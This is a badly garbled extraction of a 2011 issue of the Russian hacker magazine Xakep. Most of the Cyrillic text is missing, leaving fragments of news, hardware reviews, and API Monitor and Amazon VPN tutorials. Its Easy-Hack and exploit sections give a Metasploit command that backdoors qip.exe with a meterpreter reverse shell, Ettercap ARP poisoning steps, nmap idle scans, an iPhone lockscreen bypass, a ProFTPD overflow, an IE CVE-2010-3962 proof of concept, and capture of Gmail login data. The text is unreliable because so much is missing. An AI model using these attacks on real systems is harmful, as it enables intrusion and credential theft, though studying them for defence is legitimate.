210
:
: . 32
01 (144) 2011
2010
ICQ
CSRSS
VPN
AMAZON
INTRO
,
, .
,
Total Football Vogue :).
.
1. .
, 19. ,
.
.
27 28 :
.
, .
: 7 7,
:).
,
,
.
2. : habrahabr.ru/
company/xakep/blog/.
:
.
, ..
.
,
.
:
+154 3
.
,
, it.
3. www.xakep.ru, ,
, ,
,
. , ,
.
4.
, ,
:). :
.
!
nikitozz, .
nikitoz@real.xakep.ru
vkontakte.ru/club10933209 .
CONTENT
MegaNews
004
FERRUM
016
PC_ZONE
020
API Monitor
023
024
VPN Amazon
028
Internet Explorer 9:
032
API-
VPN-
078 JS-
Python
082
TO-5 2010
089
094
100
OpenSource
, ,
104
CSRSS
108
GUI
112
116
Linux BSD
, Windows 7
Mac OS X
036
Easy-Hack
040
046
050
054
ICQ: , ,
058
064
070
Top5 2010
134
074
X-Tools
140
FAQ UNITED
MALWARE
143
076
144
WWW2
HTTP-
ICQ
, TLS
SYN/ACK
120
124
128
PCI DSS
, ?
Zimbra:
/Internet Security
FAQ
8.5
web-
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
> DVD
Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-
>
/PUBLISHING
>
, 115280, , .
,19, , 5 ,
21
.: +7 (495) 935-7034
: +7 (495) 545-0906
>
>
>.
>
>
>
>
>
>
>
> MAN TV
>
( )
(strekneva@gameland.ru)
>
>
>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>
>
/:
>
(kosheleva@gameland.ru)
>
>
>
> :
DVD-: claim@gameland.ru.
>
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
>
101000, ,
, / 652,
,
77-11802 14.02.2002
Lietuvas Rivas,
.
130 958 .
.
. ,
,
.
.
.
:
content@gameland.ru
, , 2010
MEGANEWS
X (magazine@real.xakep.ru)
MEGANEWS
P2P-. Dead Drop
, USB-,
. -,
5 . ,
Dead Drop
, . ,
, .
- :). deaddrops.com, . ,
. , offline- :).
9 Mozilla 6-
Firefox. 86% Google.
KINECT , KINECT
Microsoft,
Project Natal, Kinect.
.
, ,
. , Kinect :
.
4 2010 10 .
Adafruit Industries
Kinect. Xbox USB-, ,
. , RGB- ,
$1000 ( Kinect $150). , ,
Microsoft, ,
:). ,
11 , GitHub .
OpenKinect (www.openkinect.org)
, .
. , MIT
Kinect iRobot Create
, .
, KinetBot
3D .
( ) ,
YouTube.
004
X 01 (144) 2011
MEGANEWS
FACEBOOK-
Facebook, ,
.
Facebook . 500
Facebook, .
? eBay Facebook Mail
$500-700 ! ?,
. . , , ,
. ,
, SMS,
@facebook.
com.
,
. Office Web
Apps, Facebook mail
Microsoft Word, Excel PowerPoint. ?
. , , more fun, . , ,
500 , Facebook
, , GMail Google HotMail
Microsoft. , Facebook
fb.com, (American Farm Bureau) :).
.
,
,
, ,
, .
,
,
- . , , .
(firmware) ,
IMEI-,
.
.
. IMEI,
(
),
. :
IMEI ?
. :
, IMEI
.
.
,
. , ,
. :
, , ?
.
, , ,
. ,
.
MEGANEWS
ANDROID
, Android. Black Hat, Intel.
. HTC Android . ,
.
proof-of-concept Google Market ( Angry Birds)
: , . Alert Logic
(, - Webkit).
: www.exploit-db.
com/exploits/15423. , , , , .
Android 2.2, 36% . ,
,
Android OS.
, Google, , .
Google Market, Android
2.2, , .
GOOGLE MAPS =
-. ,
,
, . ,
,
, ,
, -.
.
... Google Maps.
,
-,
-
. -
( ,
) , .
Google, ,
. ,
: 2007
,
, - GPS
. :
, Google Maps
Wikipedia.
Skype ,
. 22
25 . 560 .
, :
, ,
!. ,
,
, .
-
(RIAA)
. Facebook
RIAA,
- ,
!
RIAA
ZEUS
,
ZeuS, , .
,
, -,
. ,
ZeuS ,
.
,
.
.
,
, .
,
, , ,
(MDAC, Adobe Reader, Windows Help Center, Java),
ZeuS.
, , ?
, . ,
,
, ,
ZeuS-.
:
, ,
..
,
, .
,
,
.
.
- , 11
., ,
.
240 ,
.
-
:
~90 ,
. ,
:
,
. ,
(: )
.,
(:
) .. :
. ,
,
. 49.5%
294.000
Ru-Center. ,
,
. ,
. , ,
,
.
: ,
. Ru-Center,
, ,
,
, .
,
. 19
14 .
-
. (
) .
.
glassdoor.com. ,
IT-, , - (Software Engineer). , Facebook
$110 500 , $11 900 . Cisco $105 720
$8 529 Yahoo $101 638 $6 197 . , ,
Apple, Microsoft Google .
$99 127 , Google $98 814 (
: $21 364). Microsoft . , . ,
CEO Google, , (
20 000 ) 10%, $1000. , Google
Facebook.
MEGANEWS
! , AVK.Dumx.A Trojan,
(
),
.
, ,
, , .
,
$300 000,
SMS . ,
, . , -
SMS-
,
( ,
)
. ,
, .
.
SMS
-.
,
IT- ,
,
,
, -
. ,
.
W3Techs ,
,
, : PHP 74.9%, ASP.NET 23.8% Java 3.9%.
AMD
, Czernobyl,
,
.
Czernobyl ,
AMD ( Athlon
XP) x86. ,
, www.woodmann.
com ( ,
). ,
,
,
. ,
.
. AMD , ,
,
,
. ,
Czernobyl
,
.
- ,
, .
E-Ink
.
.
. E Ink
E Ink Triton,
4096 16 . ,
-,
, .
Triton -
: ,
(
). ?
.
20% Pearl,
Kindle Kindle DX.
, Triton -
.
, , Hanvon
Technology. 80%
. ,
9.68- (800600) Wi-Fi 3G,
$440. E Ink
LG Display.
Google
Tier 1. 2010 5%
, 6.4%.
Google 80%.
IPHONE
$40 000 17- - , iPhone 4. ,
, . ,
,
Apple. ? ,
. iPhone
4 , .
, , , Foxconn.
,
$130 .
, Home, , .
$279. ,
$169. ,
: www.whiteiphone4now.com.
MEGANEWS
Group-IB,
20%
. ,
$1 .
ICQ
AOL
ICQ
Digital
Sky Technologies (DST),
Mail.ru Group, $187.5 .
, ICQ
,
Mail.ru ,
DST.
, ,
ICQ-
. .
Windows 8
2012,
Microsoft.
, ,
.
. ,
,
. , ,
,
.
, $28 .
.
,
(
NFC Near Field Communication).
BlingTag, (RFID). ,
,
,
PayPal
(, ). SMS
.
, PayPal
, ,
Bling Nation.
$100,
49 .
. ,
eBay
PayPal.
.
BlingTag 20 000 ,
. ,
,
Bling Nation,
.
,
BlingTag
.
, , .
?
, ,
, .
K750 Logitech .
!
, . , K750
( ?) ,
,
.
8 .
2.4 AES
128- ( Logitech Unifying ).
$80,
,
:).
Google
, Chrome.
, : YouTube, Orkut, Blogger,
Google Docs Gmail. $500 $3133.7.
,
, Cyborg R.A.T.9 Mad
Catz .
R.A.T. , ,
.
: 25 5600
25 . , 2.4
( 1 ).
1000 , ,
, 6
/.
,
. : ,
, ,
, .
6 . , Cyborg R.A.T.9
,
. , -
9 4
.
, Cyborg R.A.T.9
5- .
, ,
. $150.
MEGANEWS
SSD ZALMAN
, Zalman
SSD-.
: S-Series N-Series.
SandForce, SSD
S-Series
JMicron. Zalman
- 2,5 SATA 3.0 Gbps,
TRIM Windows 7.
S
32, 64 128 ,
260 /. ,
, : 60 /
, 120 /
210 / . N
64
128 ,
280 270 /c
. .
32- S- $99.99,
N- $289.99.
MACBOOK AIR
Apple
MacBook Air.
-, Air
- -.
2 , ,
MacBook Air :
0.28
1.7 . , , : c
13.3- ( 1440x900
) 11.6" (
1366x768 ). 13.3-
: Intel Core 2 Duo 1.86 , 2
, -
128 256 NVIDIA
GeForce 320M 256 DDR3 SDRAM.
11- :
Intel Core 2 Duo 1.4 , 2 , - 64
128 .
, 4 . -
,
Multi-Touch, FaceTime,
.
AirPort Extreme
Wi-Fi (802.11n) Bluetooth 2.1 + EDR.
,
:
$999 11.6-
(, ).
13.3- MacBook Air $1299.
, Apple
. ,
, 11-
,
.
( ,
),
. Apple ,
,
.
FERRUM
SAMSUNG
SCX-4600
, /: 22
, : 10
: 1200X1200
, /: 22
: 1200X1200
, : 250
, : 64
, : 360
, : 416X409X275.8
, : 10.69
6500 P
,
,
. , , ,
. , ,
, . , .
, , .
,
, . Samsung SCX-4600
, ,
.
,
,
. ,
-,
Samsung SCX-4600 . ,
, , ,
:
, -
.
. ,
.
,
. , .
- . ,
AnyPrint,
,
- ,
. , .
.
, ,
AnyPrint. ,
,
, ,
, .
, :
, ,
.
, ,
, ,
. : 10 ,
(
, , , ) Samsung SCX-4600
38 , 9 .
, .
Samsung SCX-4600 , . ,
, . z
FERRUM
CANYON CNR-WCAM820
CREATIVE LIVE!CAM OPTIA AF
GENIUS ISLIM 2020AF
LOGITECH C600
LOGITECH QUICKCAM SPHERE
MICROSOFT LIFECAM VX-5500
, ,
, -.
, , .
, .
, , , -?
,
. , , ,
-, ,
- . ,
. ,
, , ,
, . , ( , )
.
, . ,
.
( ),
! ,
,
,
.
, , , ,
(
). .
, ,
, . ,
,
,
. ,
.
,
:
,
. ,
. , .
,
/ . ,
,
, , , -
.
1200 .
Canyon
CNR-WCAM820
:
, : 2,0
(), : 5,3
, /: 30
:
:
- , . Canyon CNR-WCAM820
: ( ) ,
, , . , ,
: ,
, . , ,
,
, .
, ,
. USB
, ,
.
, ,
.
2900 .
Creative
Live!Cam Optia af
:
, : 2,0
(), : 7,7
, /: 30
:
:
. . , : .
, . ,
(F/2,9),
. ,
.
, , ,
YouTube .
, .
,
.
,
, ,
, .
FERRUM
3100 .
1700 .
Genius iSlim
2020AF
:
, : 2,0
(), : 8,5
: 1,3 9 /, 2 6 /
:
:
- , , , , .
.
,
, , - ,
, .
, - .
,
, . ,
: ,
. . .
Logitech
C600
:
, : 2,0
(), : 8,0
, /: 30
:
:
, ,
,
.
( , )
. , , , :
.
, , . ,
, , : ,
.
, .
.
6000 .
2200 .
Logitech QuickCam
Sphere
Microsoft LifeCam
VX-5500
, : 2,0
(), : 8,0
, /: 30
:
:
, : 0,3
(), : 1,3
, /: 30
:
:
: , . ,
.
, ,
. ,
, ,
,
. , , . ,
, , .
, -
. ,
- .
, ,
, .
,
,
.
.
,
. ,
.
.
. ,
,
.
PC_ZONE
oxdef.info;
API Monitor
API-
, , ,
, - .
, ,
,
. API-.
Windows
DLL, .. .
API-,
. ,
, ,
.. API-,
. (
)
.
, API. RegMon FileMon
. API-,
, . API-
API Monitor. ,
API COM-. , ,
.
API Monitor?
: 1.5
2001 .
. !
.
,
.
.
Summary, ,
API: , DLL,
, API-
. ,
, .
10 000 API-
166 DLL', 700 600 COM-
( Shell, Browser, DirectShow, DirectSound, DirectX ..).
API
MSDN.
API Capture Filter API-,
. , API Monitor
GUID, IID REFIID , .
MSDN.
API Monitor , .
. CreateFileW
API Monitor
dwShareMode. , ,
1, , ?
(
Parameters Decode Parametres
Values), API Monitor
FILE_SHARE_READ | FILE_SHARE_WRITE".
API-
, .
, ,
,
API- .
, ReadFile
lpBuffer API
Monitor' lpNumberOfBytesRead
( ) .
, ( Hex Buffer),
,
. , ,
,
.
Summary
, ,
API-.
, .
Call Stack,
.
API , , .
GetLastError, CommDlgExtendedError, WSAGetLastError.
, NTSTATUS
HRESULT . , Notepad
CreateFile, API Monitor
Firefox
, . , 5,
.
API Monitor
64- .
32- 64- . , 32-
32- .
32- 64-
Windows, 32- API
Monitor.
hook
, API Monitor
. : /
, .
,
. ,
, API- CreateFileA, CreateFileW
NtCreateFile, .
API Capture Filter. ,
, , , , ,
.
(Ctrl-F Edit Find), -
DVD
dvd
DVD-
PC_ZONE
API-
WinApiOverride
API- , API, . ,
, .
kerberos
WinAPI-. API, ,
.
*.rep .
GMail
APISpy32
APISpy32 WinAPI. ,
.
CreateFile. API Monitor
. . ,
Running Processes,
API Monitor'.
. File Hook Process,
Windows notepad.exe (
). , ,
- .
.
. ,
, .
API Monitor. Summary
, Notepad'.
CreateFileW
kernel32.dll, , , NtCreateFile.
:
.
. NtCreateFile STATUS_OBJECT_NOT_FOUND, kernel32.dll Notepad
INVALID_HANDLE_VALUE 2 =
.
, - ,
API Monitor. , NtCreateFile
STATUS_SUCCESS .
.
SSL-
, API
Monitor, , API-.
, ,
SSL-, .
API Monitor , ,
. , , , , -
. Internet Explorer:
1. , SSL. Gmail.
2.
Windows Internet. : API Monitor
.
3. Running Processes Internet Explorer
(Hook).
4. ,
GMail
.
Google SSL-. API- .
5. , API Monitor, API HttpSendRequestW. ,
: , , , . lpOptional
(Post-Call Value). , Hex Buffer
, Internet Explorer .
, ASCII.
, .
Firefox, Windows Internet Netscape
Portable Runtime Mozilla SSL. , API Monitor
. , , PR_Write. Firefox',
. Summary PR_Write,
xul.dll. . POST- ,
buf. , POST /
accounts/ServiceLoginAuth ( Hex Buffer). Pre-Call Value ,
. . , API Monitor
. ,
Tools Options Maximum size of
captured buffers. .
API-, , API-,
(. ). ,
, API Monitor , .
DLL-, XML-,
.z
PC_ZONE
Step twitter.com/stepah
. . ,
, ,
, . ,
.
, ,
, ,
. ,
, ,
, .
+2
, ,
,
. :).
, . , , , ,
. ,
. : 22" 24"
6 8
.
,
. , ,
, ,
, -
. ,
, ,
.
.
,
. , ,
, ,
. , ,
. -
,
, Google Docs,
DropBox. , .
, ,
.
- .
. .
,
,
. ,
,
(,
),
.
,
. , -
,
(
).
, ,
Synergy+ (www.synergy-foss.org).
: .
, :
. ,
.
Windows, Linux Mac OS X.
,
, ,
Synergy
. (
,
) .
GUI-.
:
1. Share this computer's
keyboard and mouse (server).
2. Configure.
3. Screens
.
+ Screen Name (
!),
.
4. ,
,
.
.
.
. .
5. Test ( ,
) Start.
:
1. Use another computer's
shared keyboard and mouse (client).
2. Other
Computer's Host Name.
3. Test
,
Start.
,
. , . , Synergy Ubuntu Mac OS X:
GUI- ,
. z
PC_ZONE
Step twitter.com/stepah
VPN Amazon
VPN-
Amazon .
, , ,
, , ,
VPN-.
Amazon , : Amazon
Elastic Compute Cloud ( EC2), Amazon Elastic Block
Store ( EBS), Amazon Simple Storage Service ( S3).
.
, cloud computing .
EC2
.
, .
Instance.
, , root SSH ( Linux) RDP ( Windows).
.
, .
:
.
, , . .
.
Amazon EBS. :
AWS
25 , .
, .
Volume
.
, ,
.
S3
, .
, , .
, :10 , 1 5000
, (5 ).
, AWS Free Usage
Tier .
, . . ,
750
EC2 ( ,
), 10 EBS
( , ,
, Ubuntu) 5 S3.
Amazon,
.
,
, , ,
.
.
VPN-,
!
Ubuntu
Amazon' . AWS (aws.amazon.com)
Sign up Now.
I am a new user
Amazon.
,
. : ,
. Amazon $1-2, .
Visa MasterCard:
, Qiwi.
Amazon .
(EC2, EBS, S3
..).
. , 4-
PIN-,
. . EC2 S3
: Access Key ID Secret Access Key,
DVD
dvd
AWS.
PC_ZONE
EC2
- AWS,
, .
Elasticfox Firefox.
AWS Access Key AWS Secret Access Key.
, Amazon
(s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip)
EC2.
Java Runtime Environment.
Amazon EC2
X.509 Certificate. ,
-, : Amazon
.
AWS (aws.amazon.com/
console). ,
, EC2.
c EC2
,
(.. ) .
99.95%
.
Launch Instance ().
.
: Small Instance (Default) 1.7 GB of memory,
1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of
instance storage, 32-bit platform $0.10 Unix $0.125
. , $0.10 $0.17 . ,
. ,
Amazon Micro
Instance. .
. AMI
(Amazon Machine Image), , ,
( , Apache, MySQL,
Memcached ..), (, ). .
AMI-
Amazon', . Community
AMIs 6000 Linux Windows.
Ubuntu.
AMI ,
15 EBS, 10
. , Ubuntu 10.04 ami-c2a255ab, 10 . ID
Install. , . ,
, .
Instances . , State Running ,
. . Public DNS
. : , IP-
. !
Elastic IPs
IP- .
: ,
. ,
IP-, .
SSH,
. :
. , Security Group. ,
.
E2, Ubuntu.
SSH.
PuTTY. , Amazon pem,
PuTTY ppk. , PuTTYgen
: (Load private
key file), File.
SSH-
, :
Sessions IP- (Elastic IP)
Host Name;
Connection Data Auto-Login
ubuntu, ;
Connection SSH Auth
private-;
Session
Save.
, ,
Open.
.
PPTP
, PuTTY
, Ubuntu.
VPN- Windows
sudo /etc/init.d/pptpd restart
SSH-
,
SSH- . .
, , SSH- . :
, . , ,
VPN-. : OpenVPN, PPTP-.
. OpenVPN
. PPTP ,
, GRE. .
, Ubuntu, PPTP- .
:
, . ,
VPN- . ,
NAT. ,
/etc/sysctl.conf :
net.ipv4.ip_forward=1
:
sudo sysctl -p
NAT, :
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
.
IP-,
.
2 /etc/pptpd.conf:
localip 192.168.242.1
remoteip 192.168.242.2-5
PPTP
192.168.242.1, 4 :
192.168.242.2 192.168.240.5.
DNS-. Amazon
(172.16.0.23), , , Google Public DNS.
/etc/ppp/pptpd-options:
ms-dns 8.8.8.8
PPTP-:
echo "<_> pptpd <> *" | sudo tee -a /etc/ppp/chap-secrets
<_> <>
. . /etc/ppp/chap-secrets ,
PPTP-:
. :)
/etc/rc.local,
exit 0 :
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
VPN . , - IP-
, . speedtest.net
. , , VPN
. Amazon 15
.
: 10 . :)
Amazon ( ) . . EC2 , .
.
VPN-.
: ,
,
- . ,
Amazon Instance GPU,
CUDA.
,
? z
PC_ZONE
lenskyi.d@gmail.com
INTERNET
EXPLORER 9:
-
Internet Explorer 9?
15 - Internet
Explorer 9. , .
,
. :)
Internet Explorer
, IE ,
, . :
, . -,
, -. ,
. , . ,
Microsoft
Server is too busy :).
,
.
favicon, , , .
10 , , . NumRows HKEY_CURRENT_USER\
Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage.
, :
. ,
, ,
( 20-30 ), . ,
, .
. ,
, ,
: . ,
. Firefox'
.
- , Snap, Windows.
.. ,
( ),
.
.
,
. Windows 7,
IE .
Internet Explorer ,
. , ,
,
(, GMail)
.
PC_ZONE
. . , ,
,
. ,
, .
, , .
, ,
UI .
.
(XSS),
. Internet
Explorer .
,
.
Microsoft SmartScreen. ,
.
.
-. SmartScreen ( , -, IE
IE)
. , Internet Explorer .
. , - .
( IE InPrivate)
, ,
.
,
. ,
,
. , :
- , .
, .
, Microsoft
W3. IE9
Acid3, 95/100. 5
SVG- SMIL- SVG, . , ,
-,
.
HTML5, -
<video> <audio>. ,
( Silverlight
Flash'). ,
. , , IE9
-, .
<canvas>,
API Canvas 2D. HTML5,
. (
<canvas> ) IE9
Direct2D DirectWrite.
, . ,
DevTools.
( F12) ,
.
c HTML/CSS-,
JavaScript, User-Agent
HTTP-, .
. , , Fiddler (www.fiddler2.com/
fiddler), .
, ,
.
, , JavaScript
Format JavaScript, JavaScript
. . -,
, - . ,
.
Internet Explorer.
! z
PC_ZONE
www.insight-it.ru
100
, . .
.
, - .
HighLoad++,
, , - -
.
, .
. :
,
? ,
, , , ?
: = - + , .
:
, .
100% . ?
, ,
: ,
,
. , ,
.
Debian
Linux , ,
. HTTP- nginx,
reverse proxy.
, PHP-, . PHP- X 01 (144) 2011
mod_php Apache
, FastCGI,
,
. PHP- (, Facebook
PHP C HipHop),
-
XCache.
:
, , C
, MySQL . . ,
,
( ).
memcached. : ,
.
"" .
, ,
, , , . ,
PC_ZONE
99,5 .
40 ( ).
11 .
200 .
160/.
10 , 32
nginx ( Apache ).
30-40 , 2 , 5 , .
10 .
node.
js (
JavaScript ][ 08/2010) XMPP aka Jabber ( ).
ffmpeg, - VLC.
- ,
. ..
, .. .
. , , ,
,
. ,
, 20%.
,
DNS ( 32 IP-),
,
. ,
( )
,
memcached .
, ,
,
PHP-.
Facebook (
), Facebook
MySQL.
,
,
opensource .
( ),
.
, :
- 8- Intel ( ,
);
- 64 ;
- 8 ;
- RAID (
).
Agile
(),
: , , ,
.
(
), Debian.
,
.
memcached, ... ;
, .
.
, .
1 :).
, ,
. 4 -
,
, .
, Content Delivery
Network
.
, ,
. ,
: ? !.
, ,
( xfs) , . ,
,
:).
C. , ,
,
, , , ,
. ,
, TopCoder,
:
-
MySQL ,
.
memcached. (
).
.
GPL, -
.
, . ,
, .
,
. 10001500
,
. -
, .
, - -
, , , YouTube,
, ,
.
, Jabber (
XMPP).
opensource . (
)
, XMPP . node.js ,
JavaScript ,
.
-.
,
:
, .
. 60-80
, 150 . TCP/HTTP-
HAProxy
,
.
( ,
MongoDB),
MySQL. 5-
, node.
js ( 4 ),
MySQL.
XMPP
,
, - ,
.
, .
,
,
.
, ,
:
IFrame- easyXDM
fastXDM,
.
.
- Twitter,
.
,
openGraph- (
<title> alt .
(YouTube, RuTube, Vimeo, ..).
WARNING
warning
.
,
,
.
,
/
.
.
,
, - . ,
,
, ,
.
, ,
. - 11
, 100 . z
GreenDog agrrrdog@gmail.com
Easy Hack
1
:
IPHONE
:
. , ,
:).
, (
, ,
), , , . ,
- . ,
.
, ,
. , , .
.
, .
1)
2):
Emergency Call
3) 3 :
###
4) Call Power
! Lockscreen Bypassed!
, -, . (
), , .
! ,
- , .
iOS 4.1,
. 4.2
,
, ...
. :).
:
EXE-,
:
,
IExpress,
exe', . ,
.
Metasploit' (metasploit.com).
msfencode exe- (payload),
exe-. -
.
. qip.exe.
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 R | ./msfencode -t exe d ~ -x qip.
exe -k -o q_bd101.exe -e x86/shikata_ga_nai -c 3
msfpayload -
(LHOST). (R).
msfencode. (-e x86/
shikata_ga_nai) (- 3).
exe- (-t exe). , exe- (-d ~ ), qip.exe (-x qip.exe).
-k , exe-.
q_bd101.exe (-o q_bd101.exe).
:)
Exe-, , ,
,
MSF.
, . -
, :).
. -,
, . - (
) .
.
-k, . -, , .
-, (15 42
virustotal.com), .
Windows! ,
CRC, . -
. ,
, .
! ,
. ,
, , ,
, , -
, .
, :).
:
, , .
-, : ,
:). -, ,
, . ,
, ,
. remote_browser Ettercap-NG (ettercap.
sourceforge.net). -, -!
.
, ettercap.conf:
1) :
nano /etc/etter.conf
2) ec_uid, ec_gid :
ec_uid = 0
ec_gid = 0
3) remote_browser :
remote_browser = "firefox http://%host%url"
,
, .
- Ettercap:
1) ettercap:
ettercap -G
2)Sniff Unified sniffing;
3)Plugins Manage the plugins;
4) remote_browser;
5) :
Start Start sniffing
- -
.
, arp-poison. :
:
TCP/IP
:
-, , , , . :
, . , ,
TCP/IP,
( ). , ,
, ,
. . , ,
hping', - , .
, , Wireshark'a.
:).
.
, , , . Colasoft
Packet Builder (colasoft.com/packet_builder).
.
arp-poison GTK-Ettercap-NG
1) :
Hosts Scan for hosts
2) :
Hosts Host list IP_router Add to T1
3) ():
Hosts Host list IPs Add to T2
4) arp-poison:
Mitm Arp poisoning Sniff remote connection
pcap- , tcpreplay:
tcpreplay -i eth0 blah_blah.pcap
. -, , ,
. -, ,
.. , ,
. , , Win
Ettercap-NG.
, Windows. , .
, ,
Ethernet, ARP, IP,
TCP, UDP. , ,
:).
TCP/IP
,
, Wireshark. , Colasoft
Packet Builder cap-. Wireshark
pcap-, cap pcap ,
.
, ,
. TCP ( -
:
TCPDUMP'
), -
.
, Colasoft Packet Player.
. , tcpreplay,
, .
, .
, .
:
.
, , , , ,
, . . tcpdump
,
.
tcpdump , WireShark'
Capture Filter, .
.
tcpdump -w test.pcap -i eth0 host 192.168.0.101 and tcp portrange 1-1024
-i eth0 ;
-w test.pcap , ;
host 192.168.0.101 , /
192.168.0.101;
:
NMAP
:
. , , :).
, - /,
, . . ,
.
( ), , IP- , .
, ,
idle-, Nmap (nmap.org). Antirez
1998 , ( )
ID IP , ..
, IPID.
.
- . - , .. .
, IPID . IPID.
TCP SYN- -
IP . , SYN-ACK. SYN-ACK
TCP- , RST-
, IPID.
, RST-, . RST- ,
IPID .
, SYN- , IPID,
, .
IPID .
-s 1550 , (
tcpdump' 96 );
net 192.168 , /
192.168;
not arp ARP-.
tcpdump -w test.pcap 'src 192.168.0.101 and (tcp port 31337 or udp port 4523 or udp port 5543)'
, 192.168.0.101,
31337 TCP, 4523, 5543 UDP.
, .
, , IP-, MAC- ..
OR, AND NOT. ,
||, &&, ! . , . ,
Don't Fragment IP-,
SYN- TCP. :).
( ), ,
. nmap.
org/book/idlescan.html.
, .
, , ,
.
,
. IPID, .
,
Nmap -
(-v). , IP ID Sequence Generation:
Incremental, . . , ,
.
NSE, (nmap.org/nsedoc/
scripts/ipidseq.html).
.
:
nmap -v 192.168.0.105
192.168.0.105 IP .
idle-c:
nmap -sI 192.168.0.105 -PN -v 192.168.0.1
-, IDS/, . , .
:
,
.
. l517 (
:). code.google.com/p/l517.
.
:
1) , .
2) , -.
3) .
4) -, .
5) (
).
5) , .
Win , , -.
,
. ,
. , ,
;).
. z
- Windows
(CISS Research Team, http://twitter.com/NTarakanov )
01
PROFTPD
FTP Proftpd. ,
ZDI(Zero Day Initiative), 40 . ,
, , ,
2 !
67-
e-zine'a phrack.
.
TARGETS
BRIEF
-
pr_netio_telnet_gets() src/netio.c
, Telnet IAC (Interpret As
Command) escape-. ,
, FTP FTPS ,
.
-
mod_site_misc. ,
.
mod_site_misc
.
EXPLOIT
.
pr_netio_telnet_gets(), src/netio.c:
char *pr_netio_telnet_gets(char *buf, size_t buflen,
    pr_netio_stream_t *in_nstrm,
    pr_netio_stream_t *out_nstrm)
{
  char *bp = buf;
  unsigned char cp;
  if (buflen == 0) {
    errno = EINVAL;
    return NULL;
  }
  ...
  buflen--;
  if (in_nstrm->strm_buf)
    pbuf = in_nstrm->strm_buf;
  else
    pbuf = netio_buffer_alloc(in_nstrm);
  while (buflen) {
    ...
    while (buflen && toread > 0 &&
           *pbuf->current != '\n' && toread--) {
      cp = *pbuf->current++;
      pbuf->remaining++;
      ...
        default:
          *bp++ = TELNET_IAC;
          buflen--; <-----
          telnet_mode = 0;
          break;
      }
      ...
      *bp++ = cp;
      buflen--; <-----
    }
  ...
  properly_terminated_prev_command = TRUE;
  *bp = '\0';
  return buf;
}
, buflen
. , buflen , TELNET_IAC buflen 1,
! buflen , ,
FltReleaseContext
,
. integer overflow,
buffer overflow.
Kingcope: exploitdb.com/exploits/15449. :
FreeBSD, Linux:Debian,SUSE,CentOS. Debian Squeeze
ROP pool
buffer (cmd_rec res pr_cmd_read), Ubuntu ROP
: RWX , stub .
, Linux
(stack smashing protection) . , ! ookie
Ubuntu 24- ,
100% .
SOLUTION
proftpd-1.3.3c , , buflen,
:).
src/netio.c
.........
+/* In the situation where the previous byte was an IAC,
02
INTERNET EXPLORER (CVE-2010-3962)
TARGETS:
Websense Security Labs. , IE -
7dcb1c31 mov ecx,edi
7dcb1c33 call mshtml!CDispNode::SetBackground (7dcafe4b)
7dcb1c38 mov eax,dword ptr [edi] ; <-- -
7dcb1c3a mov ecx,edi
7dcb1c3c call dword ptr [eax+30h] ; <--
,
object[0], 0x30 .
, , , SetUserClip
.
CSS-.
PoC-, :
<html>
<table style=position:absolute;clip:rect(0)>
</html>
- :
mshtml!CLayout::EnsureDispNodeBackground+0x81:
7dcb1c2d xor esi,esi
7dcb1c2f inc esi
7dcb1c30 push esi
mshtml!CDispNode::SetUserClip+0x84:
7dd8b5d0 call mshtml!CRect::RestrictRange (7dd89389)
7dd8b5d5 mov eax,dword ptr [edi+4]
7dd8b5d8 and eax,esi
7dd8b5da movzx ecx,byte ptr mshtml!CDispNode::_extraSizeTable (7dc31c10)[eax]
7dd8b5e1 mov eax,edi
7dd8b5e3 shl ecx,2
7dd8b5e6 sub eax,ecx
7dd8b5e8 or dword ptr [eax],1 ;<-- eax -
,
heap-spray, DEP/ASLR.
:
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
exploit-db.com/
exploits/15376.
SOLUTION
,
Workaround MS.
1. KB2458511.CSS:
TABLE
{
POSI\TION: relative !important;
}
2. :
regedit /e CSS-backup.reg "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles"
3. Apply_user_CSS.reg :
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles]
"User Stylesheet"="C:\\[directory location]\\KB2458511.css"
"Use My Stylesheet"=dword:00000001
03
TREND MICRO
TARGETS:
Titanium Maximum Security
Titanium Internet Security
BRIEF
. , ,
DeviceIoControl c IoctlCode 0x220404,
,
. / .
, Ioctl-
\\.\tmtdi-:
.text:0001DB7B loc_1DB7B:
.text:0001DB7B test dword_2289C, 10000000h
.text:0001DB85 mov edi, [ebx+0Ch] ; edi
.text:0001DB88 jz short loc_1DB95
.text:0001DB8A push offset aIoctrl_bind_cf ; "[IOCTRL_BIND_CFW]\n"
.text:0001DB8F call DbgPrint
.text:0001DB94 pop ecx
.text:0001DB95 push edi ; VirtualAddress
.text:0001DB96 call esi ; MmIsAddressValid
.text:0001DB98 test al, al
.text:0001DB9A jz loc_1DD19
,
NULL
sub_10CD4,
, (, , )
PageFault.
, dword_228B4 NULL,
jmp ecx ( ).
success
.text:0001DBA0 cmp [ebp+DeviceObject], 8 ;
.text:0001DBA4 jb loc_1DD19
.text:0001DBAA mov eax, [edi] ; eax 4
.text:0001DBAC mov dword_228B4, eax ;
x-refs() dword_228B4 ,
winsock bind,
, jmp
ecx, , , !
.text:00010CD4 sub_10CD4 proc near
.text:00010CD4 mov edi, edi
.text:00010CD6 push ebp
.text:00010CD7 mov ebp, esp
.text:00010CD9 mov ecx, dword_228B4 ; ecx
.text:00010CDF xor eax, eax
.text:00010CE1 test ecx, ecx
.text:00010CE3 jz short loc_10CE8 ; NULL
.text:00010CE5 pop ebp
.text:00010CE6 jmp ecx ; !!!
.text:00010CE8 ; -----------------------------------
.text:00010CE8
.text:00010CE8 loc_10CE8:
.text:00010CE8 pop ebp
.text:00010CE9 retn 4
